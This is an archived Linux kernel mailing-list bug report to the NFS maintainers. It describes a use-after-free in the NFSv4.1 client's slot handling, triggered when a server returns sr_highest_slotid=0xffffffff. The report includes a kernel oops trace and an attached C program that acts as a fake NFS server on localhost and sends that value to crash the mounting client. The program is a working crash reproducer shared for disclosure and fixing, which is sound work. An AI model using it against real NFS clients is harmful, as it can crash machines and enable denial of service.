From: rtm@csail.mit.edu
To: Trond Myklebust <trond.myklebust@hammerspace.com>,
Anna Schumaker <anna.schumaker@netapp.com>
Cc: linux-nfs@vger.kernel.org
Subject: NFS client can use slot after it is kfree()ed
Date: Sun, 07 Nov 2021 04:57:15 -0500 [thread overview]
Message-ID: <33492.1636279035@crash.local> (raw)
[-- Attachment #1: Type: text/plain, Size: 2509 bytes --]
If the server returns sr_highest_slotid=0xffffffff in an OP_SEQUENCE
reply, nfs41_set_server_slotid_locked() will cause all the slots to be
kfree()ed, including the one that's in use. nfs41_release_slot() will
then dereference pointers extracted from the free'd slot, and possibly
crash. 0xffffffff is special due to this code:
nfs4_shrink_slot_table(tbl, highest_slotid + 1);
I've attached a program that demonstrates the bug. My machine has
slub_debug=FZP.
# uname -a
Linux (none) 5.15.0-rc7-dirty #19 SMP Sat Nov 6 12:55:40 UTC 2021 riscv64 riscv64 riscv64 GNU/Linux
# cc nfs_3.c
# ./a.out
...
[ 18.969075] Unable to handle kernel paging request at virtual address 6b6b6b6b6b6b6b68
[ 18.983273] Oops [#1]
[ 18.988716] Modules linked in:
[ 18.996151] CPU: 0 PID: 60 Comm: mount.nfs Not tainted 5.15.0-rc7-dirty #16
[ 19.008294] Hardware name: ucbbar,riscvemu-bare (DT)
[ 19.017541] epc : nfs41_release_slot+0x20/0xc8
[ 19.026918] ra : nfs41_sequence_done+0x22/0x34
[ 19.036245] epc : ffffffff802206ac ra : ffffffff80225a7a sp : ffffffd00057b7f0
...
[ 19.183462] status: 0000000200000121 badaddr: 6b6b6b6b6b6b6b68 cause: 000000000000000d
[ 19.198066] [<ffffffff802206ac>] nfs41_release_slot+0x20/0xc8
[ 19.210683] [<ffffffff80225a7a>] nfs41_sequence_done+0x22/0x34
[ 19.223249] [<ffffffff80226b5e>] nfs41_call_sync_done+0xe/0x16
[ 19.235828] [<ffffffff8071a328>] rpc_exit_task+0x26/0x74
[ 19.246807] [<ffffffff8071a4b0>] __rpc_execute+0x76/0x216
[ 19.257785] [<ffffffff8071aace>] rpc_execute+0x58/0x7e
[ 19.268764] [<ffffffff80713358>] rpc_run_task+0x12c/0x16c
[ 19.279683] [<ffffffff80220a52>] nfs4_call_sync_custom+0x12/0x32
[ 19.292304] [<ffffffff8022388a>] _nfs41_proc_secinfo_no_name.isra.0+0xca/0x13a
[ 19.306944] [<ffffffff8022886c>] nfs41_find_root_sec+0xc6/0x228
[ 19.319538] [<ffffffff8022bf2e>] nfs4_proc_get_rootfh+0x26/0x9a
[ 19.332128] [<ffffffff80248396>] nfs4_get_rootfh+0x40/0xbc
[ 19.343070] [<ffffffff80248a5a>] nfs4_server_common_setup+0x1ac/0x1be
[ 19.356076] [<ffffffff802498e6>] nfs4_create_server+0x16c/0x208
[ 19.368654] [<ffffffff8024161e>] nfs4_try_get_tree+0x16/0x4c
[ 19.381247] [<ffffffff80218bac>] nfs_get_tree+0x34a/0x3ac
[ 19.392176] [<ffffffff8012bce4>] vfs_get_tree+0x18/0x88
[ 19.403092] [<ffffffff8014a28e>] path_mount+0x4f4/0x77a
[ 19.414080] [<ffffffff8014a560>] do_mount+0x4c/0x7e
[ 19.424644] [<ffffffff8014a912>] sys_mount+0xca/0x14e
[ 19.435623] [<ffffffff80003046>] ret_from_syscall+0x0/0x2
[-- Attachment #2: nfs_3.c --]
[-- Type: application/octet-stream, Size: 7157 bytes --]
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <netinet/in.h>
#include <sys/wait.h>
#include <sys/resource.h>
#include <assert.h>
#define NAA 64
unsigned long long aa[NAA] = { 0, 0, 0, 0, 0xffffffff, 0 };
int aai = 0;
char ibuf[4096];
int ilen = 0;
int ii = 0;
char obuf[4096];
int oi = 0;
int readn(int fd, void *xbuf, int n) {
char *buf = (char *) xbuf;
int orig = n;
while(n > 0){
int cc = read(fd, buf, n);
if(cc <= 0) { perror("read"); return -1; }
n -= cc;
buf += cc;
}
return orig;
}
unsigned int
parse32()
{
if(ii >= ilen){
printf("parsed beyond the end of the input\n");
return 0;
}
unsigned int x = *(int*)(ibuf+ii);
ii += 4;
return ntohl(x);
}
unsigned long long
parse64()
{
unsigned long long hi = parse32();
unsigned long long lo = parse32();
return (hi << 32) | lo;
}
// sessionid4 -- 16 bytes
void
parse_sid(char *sid)
{
for(int i = 0; i < 16; i++){
if(sid)
sid[i] = ibuf[ii];
ii++;
}
}
unsigned int
parse_opaque(char *buf)
{
if(buf)
buf[0] = 0;
int nominal_n = parse32();
if(nominal_n > 4096){
printf("crazy opaque length %d\n", nominal_n);
return 0;
}
int real_n = nominal_n;
while((real_n%4) != 0) real_n += 1;
for(int i = 0; i < real_n; i++){
if(buf)
buf[i] = ibuf[ii];
ii++;
}
if(buf)
buf[nominal_n] = 0;
return nominal_n;
}
void
put32(unsigned int x)
{
assert((oi % 4) == 0);
*(int*)(obuf+oi) = htonl(x);
oi += 4;
}
void
put64(unsigned long long x)
{
put32(x >> 32);
put32(x);
}
void
put_opaque(int n, char *buf)
{
put32(n);
for(int i = 0; i < n; i++)
obuf[oi++] = buf[i];
while((n%4)!=0){
obuf[oi++] = 0;
n++;
}
}
void
put_sid(char *sid)
{
for(int i = 0; i < 16; i++){
obuf[oi++] = (sid ? sid[i] : 0);
}
}
void
parse_nop()
{
}
void
parse_op_exchange_id()
{
parse32(); // verifier4, first half
parse32(); // verifier4, second half
parse_opaque(0); // eia_clientowner
int cflags = parse32(); // eia_flags
parse32(); // state_protect4_a.spa_how, assume SP4_NONE
int nimpl = parse32(); // length of client_impl_id
for(int impli = 0; impli < nimpl; impli++){
char junk[512];
parse_opaque(junk); // nii_domain
// printf("nii_domain: %s\n", junk);
parse_opaque(junk); // nii_name
// printf("nii_name: %s\n", junk);
parse64(); // 1/2 of nfstime4
parse32(); // 1/2 of nfstime4
}
// finish EXCHANGE_ID4res
put32(0); // eir_status = NFS4_OK
put64(1); // clientid4
put32(1); // sequenceid4
int sflags = 0x103 | 0x10000; // EXCHGID4_FLAG_USE_NON_PNFS
put32(sflags); // eir_flags
put32(0); // state_protect4_r.spr_how = SP4_NONE
put64(1); // server_owner4.so_minor_id
put32(4); // length of so_major_id<>
put32(0x11223344); // so_major_id<>
put32(4); // length of eir_server_scope
put32(0x11223344);
put32(1); // length of eir_server_impl_id<1>
put32(4); // nfs_impl_id4.nii_domain
put32(0x11223344);
put32(4); // nfs_impl_id4.nii_name
put32(0x11223344);
put64(0); // nii_date 1/2
put32(0); // nii_date 2/2
}
void
parse_op_create_session()
{
parse64(); // csa_clientid
int seq = parse32(); // csa_sequence
parse32(); // csa_flags
// csa_fore_chan_attrs, csa_back_chan_attrs
int attrs[2][6];
for(int i = 0; i < 2; i++){
for(int j = 0; j < 6; j++){
attrs[i][j] = parse32();
}
parse_opaque(0); // ca_rdma_ird<1>
}
put32(0); // OK
for(int i = 0; i < 4; i++)
put32(1); // csr_sessionid i/4
put32(seq); // csr_sequence
put32(0x3); // csr_flags
for(int i = 0; i < 2; i++){
for(int j = 0; j < 6; j++)
put32(attrs[i][j]);
put32(0); // ca_rdma_ird
}
}
void
parse_op_sequence()
{
char sid[16];
parse_sid(sid); // sa_sessionid
int seq = parse32(); // sa_sequenceid
int slotid = parse32(); // sa_slotid
int hislot = parse32(); // sa_highest_slotid
parse32(); // sa_cachethis
put32(0); // OK
put_sid(sid); // sr_sessionid
put32(seq); // sr_sequenceid
int x1 = aa[aai++];
int x2 = aa[aai++];
int x3 = aa[aai++];
put32(x1); // sr_slotid
put32(x2); // sr_highest_slotid
put32(x3); // sr_target_highest_slotid
put32(0); // sr_status_flags
}
void parse_compound()
{
char tag[512];
int taglen = parse_opaque(tag); // tag
parse32(); // minor version
int nops = parse32();
printf("%d ops\n", nops);
// start a COMPOUND4res
put32(0); // nfsstat4 = NFS4_OK
put_opaque(taglen, tag);
put32(nops); // length of resarray<>
for(int opindex = 0; opindex < nops && oi < ilen; opindex++){
int op = parse32();
printf("op %d\n", op);
put32(op); // resop in nfs_resop4
if(op == 42){
parse_op_exchange_id();
} else if(op == 43){
parse_op_create_session();
} else if(op == 53){
parse_op_sequence();
} else {
printf("unknown op %d\n", op);
// cannot continue to the next op since
// we don't know how long this one is.
break;
}
}
}
void
parse_rpc()
{
// SUN RPC
int xid = parse32();
parse32(); // mtype=CALL
parse32(); // rpc version
parse32(); // prog#
parse32(); // prog vers
int proc = parse32();
parse32(); // cred type
parse_opaque(0); // cred
parse32(); // verf type
parse_opaque(0); // verf
put32(xid);
put32(1); // REPLY
put32(0); // MSG_ACCEPTED
put32(0); // opaque_auth flavor = AUTH_NULL
put32(0); // opaque_auth length
put32(0); // SUCCESS
if(proc == 0){
parse_nop();
} else if(proc == 1){
parse_compound();
} else {
printf("unknown rpc proc %d\n", proc);
}
}
int
main(){
struct rlimit r;
r.rlim_cur = r.rlim_max = 0;
setrlimit(RLIMIT_CORE, &r);
int s = socket(AF_INET, SOCK_STREAM, 0);
struct sockaddr_in sin;
memset(&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_port = htons(2049);
int yes = 1;
setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(yes));
if(bind(s, (struct sockaddr *)&sin, sizeof(sin)) < 0){
perror("bind"); exit(1);
}
listen(s, 10);
int pid1 = fork();
if(pid1 == 0){
close(s);
if(system("echo -n mount: ; mount 127.0.0.1:/tmp /mnt") == 0){
system("echo -n ls: ; ls -l /mnt/. /mnt/z");
system("echo -n echo: ; echo hi > /mnt/x");
system("echo -n umount: ; umount /mnt");
}
exit(0);
}
int pid2 = fork();
if(pid2 == 0){
socklen_t sinlen = sizeof(sin);
printf("calling accept\n");
int s1 = accept(s, (struct sockaddr *) &sin, &sinlen);
printf("accept returned %d\n", s1);
if(s1 < 0) { perror("accept"); exit(1); }
close(s);
while(1){
if(readn(s1, &ilen, 4) < 0) break;
ilen = ntohl(ilen);
ilen &= 0x7fffffff;
if(readn(s1, ibuf, ilen) < 0) break;
oi = ii = 0;
memset(obuf, 0, sizeof(obuf));
put32(0); // place-holder for length
parse_rpc();
*(int*)(obuf+0) = htonl((oi - 4) | 0x80000000);
if(write(s1, obuf, oi)<=0) perror("write");
}
exit(1);
}
close(s);
sleep(7);
if(system("dmesg | grep 'unhandled sig'") == 0){
printf("unhandled signal\n"); while(1){}
}
}
reply other threads:[~2021-11-07 9:57 UTC|newest]
Thread overview: [no followups] expand[flat|nested] mbox.gz Atom feed
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=33492.1636279035@crash.local \
--to=rtm@csail.mit.edu \
--cc=anna.schumaker@netapp.com \
--cc=linux-nfs@vger.kernel.org \
--cc=trond.myklebust@hammerspace.com \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox